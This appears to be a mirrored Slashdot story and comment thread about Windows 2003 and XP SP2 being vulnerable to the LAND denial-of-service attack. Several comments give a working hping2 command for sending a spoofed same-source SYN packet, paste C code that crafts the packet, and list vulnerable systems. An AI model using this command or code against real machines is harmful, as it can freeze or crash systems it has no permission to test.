Slashdot Mirror

← Back to Stories (view on slashdot.org)

Windows 2003 and XP SP2 Vulnerable To LAND Attack

Posted by Hemos on from the one-if-by-sea-two-if-by-LAND dept.

An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, WIndows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.

10 of 534 comments (clear)

  1. Re:Only win ? by redJag · · Score: 5, Informative

    There is a big list before the provided source code.

  2. What is the LAND attack? by fizbin · · Score: 5, Informative
    Quoting from http://www.insecure.org/sploits/land.ip.DOS.html:
    i recently discovered a bug which freezes win95 boxes. here's how
    it works: send a spoofed packet with the SYN flag set from a host, on an open
    port (such as 113 or 139), setting as source the SAME host and port
    (ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
    up.
    So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.
  3. Re:News? by InsaneGeek · · Score: 4, Informative

    The LAND attack requires an open port, so by definition if the system isn't running any services it will have no open ports and not be vulnerable to this attack.

  4. Want to do your own testing? by bluelip · · Score: 4, Informative

    Grab a copy of hping2 and try:

    hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd

    Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test

    --

    Yep, I never spell check.
    More incorrect spellings can be found he
  5. MOD PARENT UP ! by mirko · · Score: 4, Informative

    BSDI 2.1 (vanilla) IS vulnerable
    BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
    BSDI 3.0 NOT vulnerable
    Digital UNIX 4.0 NOT vulnerable
    FreeBSD 2.2.2-RELEASE IS vulnerable
    FreeBSD 2.2.5-RELEASE IS vulnerable
    FreeBSD 2.2.5-STABLE IS vulnerable
    FreeBSD 3.0-CURRENT IS vulnerable
    HP-UX 10.20 IS vulnerable
    IRIX 6.2 NOT vulnerable
    Linux 2.0.30 NOT vulnerable
    Linux 2.0.32 NOT vulnerable
    MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
    NetBSD 1.2 IS vulnerable
    NeXTSTEP 3.0 IS vulnerable
    NeXTSTEp 3.1 IS vulnerable
    Novell 4.11 NOT vulnerable
    OpenBSD 2.1 IS vulnerable
    OpenBSD 2.2 (Oct31) NOT vulnerable
    SCO OpenServer 5.0.4 NOT vulnerable
    Solaris 2.5.1 IS vulnerable (conflicting reports)
    SunOS 4.1.4 IS vulnerable
    Windows 95 (vanilla) IS vulnerable
    Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable

    --
    Trolling using another account since 2005.
  6. Re:I know its been around, but...Linking to source by __aaijsn7246 · · Score: 4, Informative

    Security through obsecurity doesn't work. Here's the important part of the source :) Basically it just sends a SYN packet which has the target's address as the source and the destination (same port as well).

    ---snip---
    bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->version=4;
    ipheader->ihl=siz eof(struct iphdr)/4;
    ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->id=htons(0xF1C);
    ipheader->t tl=255;
    ipheader->protocol=IP_TCP;
    ipheader->sad dr=sin.sin_addr.s_addr;
    ipheader->daddr=sin.sin_a ddr.s_addr;

    tcpheader->th_sport=sin.sin_port;
    tcpheader->th _dport=sin.sin_port;
    tcpheader->th_seq=htonl(0xF1 C);
    tcpheader->th_flags=TH_SYN;
    tcpheader->th_of f=sizeof(struct tcphdr)/4;
    tcpheader->th_win=htons(2048);

    bzero(&pseudoheader,12+sizeof(struct tcphdr));
    pseudoheader.saddr.s_addr=sin.sin_addr. s_addr;
    pseudoheader.daddr.s_addr=sin.sin_addr.s_ addr;
    pseudoheader.protocol=6;
    pseudoheader.leng th=htons(sizeof(struct tcphdr));
    bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
    tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
    ---snip---

  7. At least Windows NT is supposedly patched. by Deathlizard · · Score: 4, Informative

    http://support.microsoft.com/default.aspx?scid=kb; en-us;165005

    --
    In Soviet Russia, Trojan exploits YOU!
  8. Re:Can anyone confirm? by bluelip · · Score: 4, Informative

    The problem might be w/ your code.

    A test listed in an above comment of mine worked for my box. DL hping2 and try:

    hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd

    Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test

    --

    Yep, I never spell check.
    More incorrect spellings can be found he
  9. exploit by imipak · · Score: 4, Informative
    Courtesy of the fine (French) folk at k-otik.org... an exploit.

    Unfortuntately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?

  10. Re:Only win ? by ip_fired · · Score: 4, Informative

    I found some interesting things while playing around with this.

    1st: The checksum code is always off by 3 in that file. Subtract 3 from the value before you take the complement and it'll be right. (this is a kludge, I haven't taken the time to actually figure out why it's wrong yet)

    2nd: It causes 100% CPU usage on a WinXP SP2 box for about 3 seconds for each packet sent!!!

    3rd: It can be blocked (and probably IS blocked) by most routers since the source and destination addresses are the same.

    I got permission to send one of these packets to my friends Win2003 box and as far as we can tell, it didn't do anything. I don't know if the packet is getting through though.

    4th: Also, I retested the Mac, and again, the malformed packet did nothing.

    --
    Don't count your messages before they ACK.